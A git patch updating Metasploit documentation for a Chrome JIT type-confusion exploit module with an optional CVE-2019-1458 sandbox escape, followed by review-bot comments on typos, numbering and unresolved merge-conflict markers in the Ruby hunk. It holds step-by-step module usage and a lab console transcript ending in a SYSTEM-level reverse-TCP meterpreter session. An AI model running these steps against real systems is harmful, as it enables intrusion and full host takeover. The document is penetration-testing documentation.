From 87104a7236b09dfee1dfafa981f0c88d6cd6d371 Mon Sep 17 00:00:00 2001 From: Tim W Date: Mon, 12 Oct 2020 18:53:55 +0800 Subject: [PATCH] Update docs and make them msftidy_docs.rb compliant --- .../multi/browser/chrome_object_create.md | 97 ++++++++++++++++--- .../local/cve_2019_1458_wizardopium.md | 2 +- .../multi/browser/chrome_object_create.rb | 2 +- 3 files changed, 85 insertions(+), 16 deletions(-) diff --git a/documentation/modules/exploit/multi/browser/chrome_object_create.md b/documentation/modules/exploit/multi/browser/chrome_object_create.md index 721d0769fd0b..e9848fe2ae7f 100755 --- a/documentation/modules/exploit/multi/browser/chrome_object_create.md +++ b/documentation/modules/exploit/multi/browser/chrome_object_create.md 
@@ -1,35 +1,56 @@ -This modules exploits a type confusion in Google Chromes JIT compiler. The Object.create operation can be used to cause a type confusion between a PropertyArray and a NameDictionary. -The type confusion can be used to construct a arbitrary read/write memory primitive, which is used to write shellcode into rwx region of a WebAssembly object. +## Vulnerable Application +This modules exploits a type confusion in Google Chromes JIT compiler. +The Object.create operation can be used to cause a type confusion between a PropertyArray and a NameDictionary. +The type confusion can be used to construct a arbitrary read/write memory primitive, which is +used to write shellcode into rwx region of a WebAssembly object. -**This module does not contain an exploit to escape the sandbox, so you must launch Google Chrome with the --no-sandbox option** +This module can target the renderer process (target 0), but Google Chrome must be launched +with the --no-sandbox flag for the payload to execute successfully. -## Vulnerable Application +Alternatively, this module can use CVE-2019-1458 to escape the renderer sandbox (target 1). This +will only work on vulnerable versions of Windows (e.g Windows 7) and the exploit can only be triggered once. -The module is compatible with any 64bit Google Chrome (version 67, 68 or 69), on any platform (macOS, Linux or Windows), however the code that writes the shellcode into the rwx region (wasm_rwx_addr) may need to be modified. +Additionally the exploit can cause the target machine to restart when the session is terminated. +A BSOD is also likely to occur when the system is shut down or rebooted. + +The module is compatible with any 64bit Google Chrome (version 67, 68 or 69), on any platform (macOS, Linux or Windows), +however the code that writes the shellcode into the rwx region (wasm_rwx_addr) may need to be modified. 
**Vulnerable Application Installation Steps** You can download a vulnerable Chrome version from this location: [https://www.filepuma.com/download/google_chrome_64bit_69.0.3497.100-20128/](https://www.filepuma.com/download/google_chrome_64bit_69.0.3497.100-20128/) -You should ensure that application does not update itself to the latest version (by disabling automatic updates or simply not connecting to the internet). +You should ensure that application does not update itself to the latest version +(by disabling automatic updates or simply not connecting to the internet) You may also need to disable Windows Defender. ## Verification Steps -1. Do: ```use exploit/multi/browser/chrome_object_create``` -2. Do: ```set payload windows/x64/meterpreter/reverse_tcp``` -2. Do: ```set LHOST [IP]``` -3. Do: ```set SRVHOST [IP]``` -3. Do: ```set URIPATH / [PATH]``` -4. Do: ```run``` +1. Do: `use exploit/multi/browser/chrome_object_create` +1. Do: `set target [0|1]` +2. Do: `set payload windows/x64/meterpreter/reverse_tcp` +2. Do: `set LHOST [IP]` +3. Do: `set SRVHOST [IP]` +3. Do: `set URIPATH / [PATH]` +4. Do: `run` + +## Options + +### TARGET +``` +Id Name +-- ---- +0 No sandbox escape (--no-sandbox) +1 Windows 7 (x64) sandbox escape via CVE-2019-1458 +``` ## Scenarios -### Windows 10 and Google Chrome 69.0.3497.100 with --no-sandbox +### Windows 10 and Google Chrome 69.0.3497.100 with --no-sandbox (target 0) Start Google Chrome without a sandbox: -```"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-sandbox``` +`"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-sandbox` ``` msf5 > use exploit/multi/browser/chrome_object_create 
@@ -59,3 +80,51 @@ meterpreter > pwd C:\Program Files (x86)\Google\Chrome\Application\69.0.3497.100 meterpreter > ``` + + +### Windows 7 SP1 and Google Chrome 69.0.3497.100 with CVE-2019-1458 (target 1) + +``` + + +msf6 > use exploit/multi/browser/chrome_object_create +[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp +msf6 exploit(multi/browser/chrome_object_create) > set target 1 +target => 1 +msf6 exploit(multi/browser/chrome_object_create) > set payload windows/x64/meterpreter/reverse_tcp +payload => windows/x64/meterpreter/reverse_tcp +msf6 exploit(multi/browser/chrome_object_create) > set URIPATH / +URIPATH => / +msf6 exploit(multi/browser/chrome_object_create) > set LHOST 192.168.56.1 +LHOST => 192.168.56.1 +msf6 exploit(multi/browser/chrome_object_create) > set SRVHOST 192.168.56.1 +SRVHOST => 192.168.56.1 +msf6 exploit(multi/browser/chrome_object_create) > run +[*] Exploit running as background job 0. +[*] Exploit completed, but no session was created. +msf6 exploit(multi/browser/chrome_object_create) > +[*] Started reverse TCP handler on 192.168.56.1:4444 +[*] Using URL: http://192.168.56.1:8080/ +[*] Server started. 
+[*] 192.168.56.3 chrome_object_create - Sending / to Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36 +[*] 192.168.56.3 chrome_object_create - Sending / to Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36 +[*] 192.168.56.3 chrome_object_create - Sending /payload to Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36 +[+] 192.168.56.3 chrome_object_create - Sent stage2 exploit (20000 bytes) +[*] Sending stage (200262 bytes) to 192.168.56.3 +[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.3:49159) at 2020-10-12 18:51:15 +0800 +[*] Session ID 1 (192.168.56.1:4444 -> 192.168.56.3:49159) processing InitialAutoRunScript 'post/windows/manage/priv_migrate' +[*] Current session process is chrome.exe (2528) as: NT AUTHORITY\SYSTEM +[*] Session is already Admin and System. +[*] Will attempt to migrate to specified System level process. +[*] Trying services.exe (480) +[+] Successfully migrated to services.exe (480) as: NT AUTHORITY\SYSTEM + +msf6 exploit(multi/browser/chrome_object_create) > sessions + +Active sessions +=============== + + Id Name Type Information Connection + -- ---- ---- ----------- ---------- + 1 meterpreter x64/windows NT AUTHORITY\SYSTEM @ USER-PC 192.168.56.1:4444 -> 192.168.56.3:49159 (192.168.56.3) +``` diff --git a/documentation/modules/exploit/windows/local/cve_2019_1458_wizardopium.md b/documentation/modules/exploit/windows/local/cve_2019_1458_wizardopium.md index cf3908288f70..8c98cee6dcb3 100644 --- a/documentation/modules/exploit/windows/local/cve_2019_1458_wizardopium.md +++ b/documentation/modules/exploit/windows/local/cve_2019_1458_wizardopium.md 
@@ -16,7 +16,7 @@ of Windows. 1. Get a non-SYSTEM meterpreter session on Windows 7 SP1 x64 1. `use exploit/windows/local/cve_2019_1458_wizardopium` 1. `set session ` -1. `set payload windows/meterpreter/reverse_tcp` +1. `set payload windows/x64/meterpreter/reverse_tcp` 1. `set LHOST ` 1. `set LPORT 5555` 1. `exploit` diff --git a/modules/exploits/multi/browser/chrome_object_create.rb b/modules/exploits/multi/browser/chrome_object_create.rb index 70737c9cb66d..9d291f6532de 100644 --- a/modules/exploits/multi/browser/chrome_object_create.rb +++ b/modules/exploits/multi/browser/chrome_object_create.rb @@ -57,7 +57,7 @@ def initialize(info = {}) 'Targets' => [ ======= 'Arch' => [ ARCH_X64 ], - 'Platform' => ['windows', 'osx'], + 'Platform' => ['windows', 'osx', 'linux'], 'DefaultTarget' => 0, 'Targets' => [ >>>>>>> b5da8834bc... rubocop
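Review bot: In the first chrome_object_create.md hunk the Verification Steps list still numbers its items `1., 1., 2., 2., 3., 3., 4.`, and the `set URIPATH / [PATH]` step reads as two values; use a single numbering scheme (msftidy_docs accepts all-`1.` lists) and write the step as `1. Do: \`set URIPATH [PATH]\``. Since this PR's purpose is doc cleanup, the wording it carries over or introduces should be fixed in the same pass: "This modules exploits" (module), "Google Chromes JIT compiler" (Chrome's), "a arbitrary read/write memory primitive" (an), "into rwx region" (the rwx region), "e.g Windows 7" (e.g.), and the full stop dropped after "(by disabling automatic updates or simply not connecting to the internet)". The new `## Options` section documents the TARGET table, which is a target list rather than a datastore option; either rename the subsection or fold it into the scenario heading that already names the targets. The bold `**Vulnerable Application Installation Steps**` line is effectively a heading and would be more consistent as a `###` heading like the rest of the file.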
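Review bot: In the second chrome_object_create.md hunk (the new "Windows 7 SP1 ... (target 1)" scenario) the fenced transcript opens with two blank lines before `msf6 > use exploit/multi/browser/chrome_object_create`; remove them so the block starts on the first command. The heading states Google Chrome 69.0.3497.100, but every User-Agent line in the captured output reports `Chrome/69.0.3497.92`; change the heading to the build actually tested, or the reader will assume a build that the transcript does not show. It is also worth stating next to this scenario what the top of the file already warns, that target 1 can only be triggered once and may leave the host needing a restart, since a reader jumping straight to the scenario will miss it.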
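Review bot: In the cve_2019_1458_wizardopium.md hunk the switch to `windows/x64/meterpreter/reverse_tcp` is the right match for the "Windows 7 SP1 x64" prerequisite stated two lines above, but the surrounding context lines `set session ` and `set LHOST ` end with an empty placeholder (an angle-bracket placeholder has most likely been swallowed by markdown rendering); replace them with bracketed placeholders such as `set session [ID]` and `set LHOST [IP]`, matching the `[IP]` / `[PATH]` convention used in chrome_object_create.md, so the steps render correctly.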
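Review bot: In the chrome_object_create.rb hunk the unchanged context lines contain unresolved merge-conflict markers, `=======` and `>>>>>>> b5da8834bc... rubocop`, together with a duplicated `'Targets' => [` line; a Ruby file containing these will not parse, so the module cannot load and the one-line change to `'Platform' => ['windows', 'osx', 'linux']` cannot be exercised. Resolve the conflict on the branch before merging, and after resolving confirm that the added `'linux'` platform sits in the shared module info rather than on the Windows-only CVE-2019-1458 target, since the documentation hunk says target 1 works only on vulnerable Windows versions.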